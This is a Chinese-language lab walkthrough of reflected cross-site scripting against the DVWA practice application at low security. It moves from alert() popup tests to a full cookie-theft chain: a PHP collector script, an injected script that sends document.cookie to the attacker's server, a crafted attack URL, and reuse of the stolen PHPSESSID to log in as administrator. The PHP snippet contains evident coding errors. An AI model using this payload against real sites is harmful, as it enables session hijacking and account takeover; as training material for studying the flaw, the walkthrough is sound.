1. 程式人生 > >DVWA-xss(跨站腳本漏洞)

DVWA-xss(跨站腳本漏洞)

漏洞 127.0.0.1 一個 reflect 編輯 請求 cal 指定位置 ESS

首先進入DVWA頁面,選擇low等級。

進入xxs(reflect)頁面。

我們在彈窗中進行測試,輸入xxs則結果如下:

技術分享圖片

然後再輸入<xss>xss腳本試一試。結果如下:

技術分享圖片

查看元素發現helllo後面出現一對xss標簽,似乎可以html註入。

技術分享圖片

接下來我們進行xss彈窗測試,能彈窗則存在xss漏洞。

我們先輸入xss則在URL中顯示name=xss

那我們讓name=<script>alert(/xss/)</script>則結果如下:

技術分享圖片

註:可以彈窗的函數有alert(),confirm(),prompt()

xss攻擊思路:

主要有四方:用戶,被攻擊的web服務器,攻擊者,攻擊者的web服務器

技術分享圖片

首先進行攻擊者的web設計

我們就用下面這個URL http://127.0.0.1/cookie.php

在wamp的www目錄下創建一個cookie.php文件,內容如下:

<?php

$cookie=$_GET[‘$cookie‘];//將get請求參數存儲到cookie變量中

$file_put_contents(‘cookie.txt‘,$cookie);//把偷取的用戶cookie寫到cookie.txt文件中。

?>

構造攻擊js

<script>document.location=‘http://127.0.0.1/cookie.php/?cookie=‘+document.cookie;</script>

//document.location將頁面的內容指定到指定位置。

構造並發送攻擊URL

http://localhost:8080/DVWA-master/vulnerabilities/xss_r/?name=<script>document.location=‘http://127.0.0.1/cookie.php/?cookie=‘+document.cookie:</script># //要對參數進行URL編碼

獲得cookie.txt,我們訪問cookie.txt

技術分享圖片

PHPSESSID是被攻擊者的登錄憑證。

F12調出cookie右鍵點擊編輯把PHPSESSEN換成我們獲取的。

然後訪問DVWA的index.php,則就以管理員的身份進入,如下圖

技術分享圖片

DVWA-xss(跨站腳本漏洞)